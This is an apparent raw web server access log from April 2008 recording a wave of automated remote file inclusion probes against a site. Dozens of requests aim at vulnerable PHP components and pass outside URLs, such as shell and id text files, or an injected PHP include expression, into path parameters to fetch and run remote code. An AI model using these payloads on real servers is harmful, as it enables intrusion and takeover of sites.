195.205.178.120 - - [01/Apr/2008:10:06:59 -0700] "GET /error.php?error=http://www.markbadmintonclub.co.uk/calendar/tools/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:10:07:18 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.192.40 - - [01/Apr/2008:10:07:20 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.192.40 - - [01/Apr/2008:10:07:20 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.10.243.102 - - [01/Apr/2008:10:07:37 -0700] "GET /logs/access_080118.log//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sdsurha.com/pblog/content/06/08/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.118.117.79 - - [01/Apr/2008:10:08:39 -0700] "GET /logs/access_080223.log/index2.php?mosConfig_absolute_path=http://www.perfecttransportation.com/cache/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.118.117.79 - - [01/Apr/2008:10:08:39 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.perfecttransportation.com/cache/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.63.186 - - [01/Apr/2008:10:11:36 -0700] "GET /logs/access_080127.log/scanhttp://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:11:37 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:11:37 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:11:37 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:11:38 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:11:38 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:11:38 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:11:54 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:11:54 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:11:55 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:11:55 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:11:55 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:11:56 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.156.192.5 - - [01/Apr/2008:10:11:56 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.156.192.5 - - [01/Apr/2008:10:11:56 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.156.192.5 - - [01/Apr/2008:10:11:57 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.242.135 - - [01/Apr/2008:10:12:02 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:10:12:04 -0700] "GET /logs/access_080215.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:10:12:04 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:10:12:04 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.192.40 - - [01/Apr/2008:10:12:37 -0700] "GET /logs/access_080112.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:10:12:42 -0700] "GET /logs/access_080306.log//main.php?pageURL=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:10:12:43 -0700] "GET //main.php?pageURL=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:10:12:43 -0700] "GET /logs//main.php?pageURL=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.233 - - [01/Apr/2008:10:12:43 -0700] "GET /logs/access_080215.log/login.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.233 - - [01/Apr/2008:10:12:44 -0700] "GET /login.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.233 - - [01/Apr/2008:10:12:44 -0700] "GET /logs/login.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:10:12:49 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:12:56 -0700] "GET /index3.php?name=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:12:57 -0700] "GET /logs/index3.php?name=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
213.156.192.5 - - [01/Apr/2008:10:13:09 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:10:13:39 -0700] "GET /logs/access_080312.log//main.php?pageURL=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:10:14:12 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:10:14:13 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:10:14:14 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:10:14:15 -0700] "GET /logs/access_080126.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.192.40 - - [01/Apr/2008:10:14:53 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:14:57 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:14:58 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:14:58 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:15:08 -0700] "GET /menu.php?path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:15:09 -0700] "GET /logs/menu.php?path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:10:15:16 -0700] "GET /logs/access_080211.log/index.php?configFile=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:10:15:16 -0700] "GET /index.php?configFile=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:10:15:17 -0700] "GET /logs/index.php?configFile=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.63.186 - - [01/Apr/2008:10:15:27 -0700] "GET /logs/access_080127.log/scanhttp://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.9 - - [01/Apr/2008:10:15:28 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [01/Apr/2008:10:15:29 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [01/Apr/2008:10:15:30 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:10:16:02 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:10:16:02 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:10:16:03 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:16:09 -0700] "GET /home.php?path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:16:09 -0700] "GET /logs/home.php?path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:10:16:32 -0700] "GET /logs/access_080213.log/index.php?configFile=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:10:16:36 -0700] "GET //ashnews.php?pathtoashnews=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.65.132 - - [01/Apr/2008:10:17:12 -0700] "GET /logs/access_080201.log//convert/mvcw.php?step=1&vwar_root=http://www.kilbowiethistle.com/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.190.65.132 - - [01/Apr/2008:10:17:12 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.kilbowiethistle.com/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.190.65.132 - - [01/Apr/2008:10:17:12 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.kilbowiethistle.com/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:10:17:29 -0700] "GET /show.php?page=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:10:17:29 -0700] "GET /show.php?page=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.195.192.40 - - [01/Apr/2008:10:17:49 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:10:17:59 -0700] "GET /logs/access_080131.log/show.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:10:18:00 -0700] "GET /show.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:10:18:00 -0700] "GET /logs/show.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:10:18:24 -0700] "GET /logs/access_080131.log/show.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:10:18:24 -0700] "GET /show.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:10:18:25 -0700] "GET /logs/show.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.195.192.40 - - [01/Apr/2008:10:19:13 -0700] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:10:19:43 -0700] "GET /logs/access_080313.log/index1.php?=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:10:19:43 -0700] "GET /index1.php?=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:10:19:45 -0700] "GET /logs/index1.php?=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:10:19:47 -0700] "GET /logs/access_080313.log/index1.php?=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:10:19:48 -0700] "GET /index1.php?=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:10:19:48 -0700] "GET /logs/index1.php?=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [01/Apr/2008:10:19:49 -0700] "GET /home.php?mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
208.1.62.200 - - [01/Apr/2008:10:19:49 -0700] "GET /logs/home.php?mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
203.130.242.135 - - [01/Apr/2008:10:20:13 -0700] "GET //ashnews.php?pathtoashnews=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:20:26 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:20:26 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:20:26 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:20:27 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.44.92 - - [01/Apr/2008:10:20:27 -0700] "GET /logs/access_080313.log HTTP/1.0" 200 491234 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:20:32 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
208.1.62.200 - - [01/Apr/2008:10:20:57 -0700] "GET /index.php?next=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
208.1.62.200 - - [01/Apr/2008:10:20:57 -0700] "GET /logs/index.php?next=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:10:21:00 -0700] "GET /logs/access_080228.log/show.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.59.22.92 - - [01/Apr/2008:10:21:25 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:21:28 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:21:30 -0700] "GET /index.php?root_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:10:21:31 -0700] "GET /logs/index.php?root_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:21:34 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:10:21:35 -0700] "GET /logs/access_080228.log/show.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.221.130.9 - - [01/Apr/2008:10:22:45 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:22:53 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:22:53 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:22:53 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:22:55 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:22:55 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:10:22:55 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.6.17.166 - - [01/Apr/2008:10:23:02 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.17.166 - - [01/Apr/2008:10:23:03 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:24:09 -0700] "GET /logs/access_080312.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.190.65.132 - - [01/Apr/2008:10:24:14 -0700] "GET /logs/access_080112.log//convert/mvcw.php?step=1&vwar_root=http://www.kilbowiethistle.com/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:24:21 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:24:23 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:24:23 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:10:25:09 -0700] "GET /logs/access_080312.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com" 66.7.205.115